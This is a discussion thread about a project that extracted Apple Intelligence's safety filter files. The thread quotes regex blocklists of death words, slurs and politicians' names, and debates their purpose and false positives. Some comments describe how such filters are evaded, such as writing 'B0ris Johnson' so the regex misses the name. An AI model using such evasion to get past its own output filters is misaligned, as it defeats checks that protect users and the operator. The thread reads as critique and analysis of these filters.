I extracted the safety filters from Apple Intelligence models

trebligdivad|7 months ago

Some of the combinations are a bit weird, This one has lots of stuff avoiding death....together with a set ensuring all the Apple brands have the correct capitalisation. Priorities hey!

https://github.com/BlueFalconHD/apple_generative_model_safet...

grues-dinner|7 months ago

Interesting that it didn't seem to include "unalive".

Which as a phenomenon is so very telling that no one actually cares what people are really saying. Everyone, including the platforms knows what that means. It's all performative.

comex|7 months ago

This is in the directory "com.apple.gm.safety_deny.output.summarization.cu_summary.proactive.generic".

My guess is that this applies to 'proactive' summaries that happen without the user asking for it, such as summaries of notifications.

If so, then the goal would be: if someone iMessages you about someone's death, then you should not get an emotionless AI summary. Instead you would presumably get a non-AI notification showing the full text or a truncated version of the text.

In other words, avoid situations like this story [1], where someone found it "dystopian" to get an Apple Intelligence summary of messages in which someone broke up with them.

For that use case, filtering for death seems entirely appropriate, though underinclusive.

This filter doesn’t seem to apply when you explicitly request a summary of some text using Writing Tools. That probably corresponds to “com.apple.gm.safety_deny.output.summarization.text_assistant.generic” [2], which has a different filter that only rejects two things: "Granular mango serpent", and "golliwogg".

Sure enough, I was able to get Writing Tools to give me summaries containing "death", but in cases where the summary should contain "granular mango serpent" or "golliwogg", I instead get an error saying "Writing Tools aren't designed to work with this type of content." (Actually that might be the input filter rather than the output filter; whatever.)

"Granular mango serpent" is probably a test case that's meant to be unlikely to appear in real documents. Compare to "xylophone copious opportunity defined elephant" from the code_intelligence safety filter, where the first letter of each word spells out "Xcode".

But one might ask what's so special about "golliwogg". It apparently refers to an old racial caricature, but why is that the one and only thing that needs filtering?

[1] https://arstechnica.com/ai/2024/10/man-learns-hes-being-dump...

[2] https://github.com/BlueFalconHD/apple_generative_model_safet...

junon|7 months ago

Also feels like some of these would match totally innocuous usage.

"I'm overloaded for work, I'd be happy if you took some of it off me."

"The client seems to have passed on the proposed changes."

Both of those would match the "death regexes". Seems we haven't learned from the "glbutt of wine" problem of content filtering even decades later - the learnings of which are that you simply cannot do content filtering based on matching rules like this, period.

andy99|7 months ago

> Apple brands have the correct capitalisation. Priorities hey!

To me that's really embarrassing and insecure. But I'm sure for branding people it's very important.

matsemann|7 months ago

So it blocks it from suggesting to "execute" a file or "pass on" some information.

theknarf|7 months ago

Filtering on the words "execute" and "executing" is going to create problems if you want to build agents that execute commands.

unknown|7 months ago

[deleted]

baxtr|7 months ago

Don’t be so judgmental. People in corporate America do have their priorities right!

raverbashing|7 months ago

This seems to be for "region/CN" China?

lostlogin|7 months ago

I’m always irritated at reference to MAC computers, so I’m with Apple on this one.

unknown|7 months ago

[deleted]

bawana|7 months ago

Alexandra Ocasio Cortez triggers a violation?

https://github.com/BlueFalconHD/apple_generative_model_safet...

mmaunder|7 months ago

As does:

   "(?i)\\bAnthony\\s+Albanese\\b",
    "(?i)\\bBoris\\s+Johnson\\b",
    "(?i)\\bChristopher\\s+Luxon\\b",
    "(?i)\\bCyril\\s+Ramaphosa\\b",
    "(?i)\\bJacinda\\s+Arden\\b",
    "(?i)\\bJacob\\s+Zuma\\b",
    "(?i)\\bJohn\\s+Steenhuisen\\b",
    "(?i)\\bJustin\\s+Trudeau\\b",
    "(?i)\\bKeir\\s+Starmer\\b",
    "(?i)\\bLiz\\s+Truss\\b",
    "(?i)\\bMichael\\s+D\\.\\s+Higgins\\b",
    "(?i)\\bRishi\\s+Sunak\\b",

https://github.com/BlueFalconHD/apple_generative_model_safet...

Edit: I have no doubt South African news media are going to be in a frenzy when they realize Apple took notice of South African politicians. (Referring to Steenhuisen and Ramaphosa specifically)

michaelt|7 months ago

I assume all the corporate GenAI models have blocks for "photorealistic image of <politician name> being arrested", "<politician name> waving ISIS flag", "<politician name> punching baby" and suchlike.

jofzar|7 months ago

AOC is very vocal about AI and is leading a bill related to AI. It's probably a "let's not fuck around and find out" situation

https://thehill.com/policy/technology/5312421-ocasio-cortez-...

AmazingTurtle|7 months ago

"driving with Focus turned on"

https://github.com/BlueFalconHD/apple_generative_model_safet...

bahmboo|7 months ago

Perhaps in context? Maybe the training data picked up on her name as potentially used as a "slur" associated with her race. Wonder if there are others I know I can look.

FateOfNations|7 months ago

interesting, that's specifically in the Spanish localization.

cpa|7 months ago

I think that’s because she’s been victim of a lot of deep fake porn

torginus|7 months ago

I find it funny that AGI is supposed to be right around the corner, while these supposedly super smart LLMs still need to get their outputs filtered by regexes.

jonas21|7 months ago

I don't think anyone believes Apple's LLMs are anywhere near state of the art (and certainly not their on-device LLMs).

fastball|7 months ago

To be fair, there are people who I sometimes wish I could filter with regex.

cyanydeez|7 months ago

It's similar to how all the new power sources are basically just "cool, lets boil water with it"

crazylogger|7 months ago

Humans are checked against various rules and laws (often carried out by other humans.) So this is how it's going to be implemented in an "AI organization" as well. Nothing strange about this really.

LLM is easier to work with because you can stop a bad behavior before it happens. It can be done either with deterministic programs or using LLM. Claude Code uses a LLM to review every bash command to be run - simple prefix matching has loopholes.

jama211|7 months ago

It’s more funny that anyone is taking your comment seriously. You may as well ask “if self driving cars are so smart why do they still need tyres?”

fl0id|7 months ago

Actually even of their was AGI, it would be even more necessary to control it.

unknown|7 months ago

[deleted]

bahmboo|7 months ago

This is just policy and alignment from Apple. Just because the Internet says a bunch of junk doesn't mean you want your model spewing it.

userbinator|7 months ago

China calls it "harmonious society", we call it "safety". Censorship by any other name would be just as effective for manipulating the thoughts of the populace. It's not often that you get to see stuff like this.

energy123|7 months ago

This is the rhetorical tactic of false equivalence. State censorship by an autocracy with the objective of population control is not the same thing as a private company inside a democracy censoring their product to avoid bad press and maintain goodwill for shareholders. If you want solid proof that it's not the same thing, see all the uncensored open weights models that you can freely download and use without fear of persecution.

madeofpalk|7 months ago

I don't think it's controversial or unsurprising at all that a company doesn't want their random sentence generator to spit out 'brand damaging' sentences. You know the field day media would have Apple's new feature summarises a text message as "Jane thinks Anthony Albanese should die".

jeroenhd|7 months ago

I still remember when "bush hid the facts" went around the news cycle. Entertainment services will absolutely slam and misrepresent any small mistake made by large companies.

I don't think it's as much a problem with safety as it is a problem with AI. We haven't figured out how to remove information from LLMs so when an LLM starts spouting bullshit like "<random name> is a paedophile", companies using AI have no recourse but to rewrite the input/output of their predictive text engines. It's no different than when Microsoft manually blacklisted the function name for the Fast Inverse Square Root that it spat out verbatim, rather than actually removing the code from their LLM.

This isn't 1984 as much as it's companies trying to hide that their software isn't ready for real world use by patching up the mistakes in real time.

cyanydeez|7 months ago

In america is due to lawyers, nothing more.

Ya'll love capitalism until it starts manipulating the populace into the safest space to sell you garbage you dont need.

Then suddenly its all "ma free speech"

binarymax|7 months ago

Wow, this is pretty silly. If things are like this at Apple I’m not sure what to think.

https://github.com/BlueFalconHD/apple_generative_model_safet...

EDIT: just to be clear, things like this are easily bypassed. “Boris Johnson”=>”B0ris Johnson” will skip right over the regex and will be recognized just fine by an LLM.

deepdarkforest|7 months ago

It's not silly. I would bet 99% of the users don't care that much to do that. A hardcoded regex like this is a good first layer/filter, and very efficient

tpmoney|7 months ago

I doubt the purpose here is so much to prevent someone from intentionally side stepping the block. It's more likely here to avoid the sort of headlines you would expect to see if someone was suggested "I wish ${politician} would die" as a response to an email mentioning that politician. In general you should view these sorts of broad word filters as looking to short circuit the "think of the children" reactions to Tiny Tim's phone suggesting not that God should "bless us, every one", but that God should "kill us, every one". A dumb filter like this is more than enough for that sort of thing.

bigyabai|7 months ago

> If things are like this at Apple I’m not sure what to think.

I don't know what you expected? This is the SOTA solution, and Apple is barely in the AI race as-is. It makes more sense for them to copy what works than to bet the farm on a courageous feature nobody likes.

Aeolun|7 months ago

The LLM will. But the image generation model that is trained on a bunch of pre-specified tags will almost immediately spit out unrecognizable results.

Lockal|7 months ago

What prevents Apple from applying a quick anti-typo LLM which restores B0ris, unalive, fixs tpyos, and replaces "slumbering steed" with a "sleeping horse", not just for censorship, but also to improve generation results?

miohtama|7 months ago

Sounds like UK politics is taboo?

stefan_|7 months ago

Why are these things always so deeply unserious? Is there no one working on "safety in AI" (oxymoron in itself of course) that has a meaningful understanding of what they are actually working with and an ability beyond an interns weekend project? Reminds me of the cybersecurity field that got the 1% of people able to turn a double free into code execution while 99% peddle checklists, "signature scanning" and deal in CVE numbers.

Meanwhile their software devs are making GenerativeExperiencesSafetyInferenceProviders so it must be dire over there, too.

1f60c|7 months ago

It's pretty easy to understand why Apple doesn't want its models to reproduce racial slurs, but what’s wrong with "Boris Johnson?"

(See, e.g., here: https://github.com/BlueFalconHD/apple_generative_model_safet...)

nedt|7 months ago

I think it's in there so you can't let it generate an email reply about how awesome peppa pig is.

qoez|7 months ago

"Justin Trudeau" too. At least it's somewhat unbiased. Still weird imo.

vishnugupta|7 months ago

There are other UK politicians as well? Interesting.

m3kw9|7 months ago

But allow hitler?

stripline|7 months ago

Interesting that you picked one from the “B” words..

skygazer|7 months ago

I'm pretty sure these are the filters that aim to suppress embarrassing or liability inducing email/messages summaries, and pop up the dismissible warning that "Safari Summarization isn't designed to handle this type of content," and other "Apple Intelligence" content rewriting. They filter/alter LLM output, not input, as some here seem to think. Apple's on device LLM is only 3b params, so it can occasionally be stupid.

kmfrk|7 months ago

A lot of these terms are very weird and bland. Honestly I'm mostly reminded of Apple's bizarre censorship screw-up that didn't blow up that much, even though it was pretty uniquely embarrassing:

https://www.theverge.com/2021/3/30/22358756/apple-blocked-as...

waterproof|7 months ago

Here's a combined file of all the non-locale-specific rules, for easier review: https://github.com/BlueFalconHD/apple_generative_model_safet...

It was generated as part of this PR to consolidate the metadata.json files: https://github.com/BlueFalconHD/apple_generative_model_safet...

RachelF|7 months ago

In the 1970's George Carlin had "7 Words You Can't Say On TV" and got into legal trouble for saying them during his live skits.

Seems like Apple now has a list of 7,000 words you can't use on an iPhone now.

efitz|7 months ago

I’m going to change my name to “Granular Mango Serpent” just to see what those keywords are for in their safety instructions.

RainyDayTmrw|7 months ago

It may be a squeamish ossifrage[1] or a seraphim proudleduck[2], which is to say that it was an artificial phrase chosen to be extremely unlikely to occur naturally. In this case, the purpose is likely for QA. It's much easier to QA behavior with a special-purpose but otherwise unoffensive phrase than to make your QA team repeatedly say allegedly offensive things to your AI.

[1] https://en.wikipedia.org/wiki/The_Magic_Words_are_Squeamish_... [2] https://en.wikipedia.org/wiki/SEO_contest

fouronnes3|7 months ago

Granular Mango Serpent is the new David Meyer.

https://arstechnica.com/information-technology/2024/12/certa...

Ey7NFZ3P0nzAe|7 months ago

Well it's one thing to regex filter "boris johnson" but i see that "chatgpt" is filtered too and that's f*** up:

https://github.com/BlueFalconHD/apple_generative_model_safet...

Ey7NFZ3P0nzAe|7 months ago

Ffs it's also rejecting french words related to being poor or immigrant or even welfare:

https://github.com/BlueFalconHD/apple_generative_model_safet...

Aide sociale Chomeur Sans abri Démuni

That's insane!

kridsdale1|7 months ago

“Gemini” is in there too.

cluckindan|7 months ago

I think these are test data and not actual safety filters.

https://github.com/BlueFalconHD/apple_generative_model_safet...

BlueFalconHD|7 months ago

There is definitely some testing stuff in here (e.g. the “Granular Mango Serpent” one) but there are real rules. Also if you test phrases matched by the regexes with generation (via Shortcuts or Foundation Models Framework) the blocklists are definitely applied.

This specific file you’ve referenced is rhetorical v1 format which solely handles substitution. It substitutes the offensive term with “test complete”

Animats|7 months ago

Some of the data for locale "CN" has a long list of forbidden phrases. Broad coverage of words related to sexual deviancy, as expected. Not much on the political side, other than blocks on religious subjects.[1]

This may be test data. Found

     "golliwog": "test complete"

[1] https://github.com/BlueFalconHD/apple_generative_model_safet...

BlueFalconHD|7 months ago

This is definitely an old test left in. But that word isn’t just a silly one, it is offensive (google it). This is the v1 safety filter, it simply maps strings to other strings, in this case changing golliwog into “test complete”. Unless I missed some, the rest of the files use v2 which allows for more complex rules

mike_hearn|7 months ago

Are you sure it's fully deobfuscated? What's up with reject phrases like "Granular mango serpent"?

pbhjpbhj|7 months ago

Speculation: Maybe they know that the real phrase is close enough in the vector space to be treated as synonymous with "granular mango serpent". The phrase then is like a nickname that only the models authors know the expected interference of?

Thus a pre-prompt can avoid mentioning the actual forbidden words, like using a patois/cant.

electroly|7 months ago

"GMS" = Generative Model Safety. The example from the readme is "XCODE". These seem to be acronyms spelled out in words.

RainyDayTmrw|7 months ago

I commented in another thread[1] that it's most likely a unique, artificial QA input, to avoid QA having to repeatedly use offensive phrases or whatever.

[1] https://news.ycombinator.com/item?id=44486374

tablets|7 months ago

Maybe something to do with this? https://en.m.wikipedia.org/wiki/Mango_cult

BlueFalconHD|7 months ago

These are the contents read by the Obfuscation functions exactly. There seems to be a lot of testing stuff still though, remember these models are relatively recent. There is a true safety model being applied after these checks as well, this is just to catch things before needing to load the safety model.

consonaut|7 months ago

If you try to use the phrase with Apple Intelligence (e.g. in Notes asking for a rewrite) it will just say "Writing tools unavailable".

Maybe it's an easy test to ensure the filters are loaded with a phrase unlikely to be used accidentaly?

andy99|7 months ago

I clicked around a bit and this seems to be the most common phrase. Maybe it's a test phrase?

airstrike|7 months ago

the one at the bottom of the README spells out xcode

wyvern illustrous laments darkness

KTibow|7 months ago

Maybe it's used to verify that the filter is loaded.

jjani|7 months ago

Did you only extract the English versions or is this as usual another case where big tech only cares to censor in English?

jeroenhd|7 months ago

It also contains some German(-speaking) locales to filter out things like Fuhrer and Führer. But the filters are so scarce and there are magical phrases are so prevalent that I think this is mostly test code at the moment.

neuroticnews25|7 months ago

Aren't these [0] lines wrong?

"[\\b\\d][Aa]bbo[\\bA-Z\\d]",

\b inside a set (square brackets) is a backspace character [1], not a word boundary. I don't think it was intended? Or is the regex flavor used here different?

[0] https://github.com/BlueFalconHD/apple_generative_model_safet...

[1] https://developer.apple.com/documentation/foundation/nsregul...

BlueFalconHD|7 months ago

The framework loading these is in Swift. I haven’t gotten around to the logic for the JSON/regex parsing but ChatGPT seems to understand the regexes just fine

extraduder_ire|7 months ago

This reminds me of the extensive list of regexes twitch had for filtering allowed usernames that came out when they were hacked.

efilife|7 months ago

I had no idea about this, where can I read them?

BlueFalconHD|7 months ago

One additional note for everyone is that this is an additional safety step on top of the safety model, so this isn’t exhaustive, there is plenty more that the actual safety model catches, and those can’t easily be extracted.

unknown|7 months ago

[deleted]

MatekCopatek|7 months ago

You can design a racist propaganda poster, put someone's face onto a porn pic or manipulate evidence with photoshop. Apart from super specific things like trying to print money, the tool doesn't stop you from doing things most people would consider distasteful, creepy or even illegal.

So why are we doing this now? Has anything changed fundamentally? Why can't we let software do everything and then blame the user for doing bad things?

dkyc|7 months ago

I think what changed is that we at least can attempt to limit 'bad' things with technical measures. It was legitimately technically impossible 10 years ago to prevent Photoshop from designing propaganda posters. Of course today's 'LLM safety' features aren't watertight either, but with the combination of 'input is natural language' plus LLM-based safety measures, there are more options today to restrict what the software can do than in the past.

The example you gave about preventing money counterfeiting with technical measures also supports this, since this was an easier thing to detect technically, and so it was done.

Whether that's a good thing or bad thing everyone has to decide for themselves, but objectively I think this is the reason.

MisterTea|7 months ago

What's hard to understand here? Those tools require skill and time to develop. AI makes things like those racist posters and revenge porn completely effortless and instant.

unknown|7 months ago

[deleted]

mindcrash|7 months ago

So far I've found Adobe Firefly, Llama, ChatGPT, Claude and Claude AI are considered naughty words. There's probably more in the list, though.

What the actual fuck? Censorship much?

Cort3z|7 months ago

What are they protecting against? Honestly. LLMs should probably have an age limit, and then, if you are above, you should be adult enough to understand what this is and how it can be used.

To me, it seems like they only protect against bad press

matusp|7 months ago

Yes, it is indeed to mitigate bad press. Unfortunately, the discussion about AI is so ridiculous, that it is often considered newsworthy when a product generates something funky for a person with large enough Twitter audience. Nobody wants to answer the questions about why their LLM generated it and how they will prevent it in the future.

plutokras|7 months ago

> What are they protecting against? Honestly.

They are protcting their producer from bad PR.

bombcar|7 months ago

There’s got to be a way to turn these lists of “naughty words” into shibboleths somehow.

spydum|7 months ago

Love idea, but I think there are simply too many models to make it practical?

immibis|7 months ago

Like asking sensitive employment candidates about Kim Jong Un's roundness to check if they're North Korean spies, we could ask humans what they think about Trump and Palestine to check if they're computers.

However, I think about half of real humans would also fail the test.

Applejinx|7 months ago

The funny thing is, I have an AU/VST plugin for altering only the exponents not the mantissas of audio samples (simple powers of 2 multiply/divide) called BitShiftGain.

So any time I say that on YouTube, it figures I'm saying another word that's in Apple safety filters under 'reject', so I have to always try to remember to say 'shifting of bits gain' or 'bit… … … shift gain'.

So there's a chain of machine interpretation by which Apple can decide I'm a Bad Man. I guess I'm more comfortable with Apple reaching this conclusion? I'll still try to avoid it though :)

Y_Y|7 months ago

Nice to see that we are protected from talking about these weird old dolls:

https://en.wikipedia.org/wiki/Golliwog

https://github.com/BlueFalconHD/apple_generative_model_safet...

sixothree|7 months ago

I can remember the last time I saw one of these. It wasn't that long ago.

oblio|7 months ago

Well, they're not only weird, they're obviously racist doll.

azalemeth|7 months ago

Some of these are absolutely wild – com.apple.gm.safety_deny.input.summarization.visual_intelligence_camera.generic [1] – a camera input filter – rejects "Granular mango serpent and whales" and anything matching "(?i)\\bgolliwogg?\\b".

I presume the granular mango is to avoid a huge chain of ever-growing LLM slop garbage, but honestly, it just seems surreal. Many of the files have specific filters for nonsensical english phrases. Either there's some serious steganography I'm unaware of, or, I suspect more likely, it's related to a training pipeline?

[1] https://github.com/BlueFalconHD/apple_generative_model_safet...

supriyo-biswas|7 months ago

I believe the "granular mango serpent" is an uncommon testing phrase that they use, although now with this discussion it has suffered the same fate as "correct horse battery staple.

The more concerning thing is that some of the locales like it-IT have a blocklist that contains most countries' names; I wonder what that's about.

whywhywhywhy|7 months ago

Second one is an old slur in UK English.

rgovostes|7 months ago

Is this related in any way to Core ML model encryption (https://developer.apple.com/documentation/coreml/encrypting-...)? I find that feature a little bizarre because Apple has historically avoided providing any kind of DRM solution for app asset protection.

BlueFalconHD|7 months ago

Nope. This is a separate system. It’s not even abstracted for any asset, it is specifically only for these overrides. The decryption is done in the ModelCatalog private framework.

noname120|7 months ago

https://github.com/search?q=repo%3ABlueFalconHD%2Fapple_gene...

jacquesm|7 months ago

These all condense to 'think different'. As long as 'different' coincides with Apple's viewpoints.

apricot|7 months ago

Quis custodiet ipsos custodes corporatum?

tempodox|7 months ago

nemo videtur.

unknown|7 months ago

[deleted]

seeknotfind|7 months ago

Long live regex!

jama211|7 months ago

I swear the more I read comments here the more I just read old men shaking their fist at clouds… do better y’all.

unknown|7 months ago

[deleted]

Aeolun|7 months ago

Why Xylophone?

netsharc|7 months ago

Just noticed "xylophone copious opportunity defined elephant" spells "xcode".

sandworm101|7 months ago

No shoot, bombs or bombers? I guess apple isnt interested in military contracts. Or, frankly, any work for world peace organizations dedicated to detecting and preventing genocide. And without talk of losing lives, much of the gaming industry is out too.

But i dont see the really bad stuff, the stuff i wont even type here. I guess that remains fair game. Apple's priorities remain as weird as ever.

immibis|7 months ago

The International Criminal Court is banned from using Microsoft products. Corporations really don't want to be involved in anything controversial unless it brings correspondingly large profits.

unknown|7 months ago

[deleted]

EverydayBalloon|7 months ago

[deleted]

zombot|7 months ago

Who would have thought that this AI shit that is being forced on us ushers in a new round of censorship and control of formerly free speech! /s

437 comments